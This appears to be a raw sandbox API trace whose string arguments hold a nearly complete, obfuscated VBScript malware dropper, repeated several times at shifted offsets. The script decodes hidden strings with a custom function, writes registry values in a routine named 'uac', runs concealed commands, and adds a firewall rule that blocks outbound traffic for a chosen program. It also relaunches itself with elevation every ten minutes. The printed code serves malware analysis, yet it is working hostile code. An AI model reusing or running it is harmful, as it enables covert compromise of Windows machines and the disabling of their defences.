bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.280] wcsncmp (_String1="m key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.280] wcsncmp (_String1=" key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.280] wcsncmp (_String1="key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 94 [0226.280] wcsncmp (_String1="ey\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 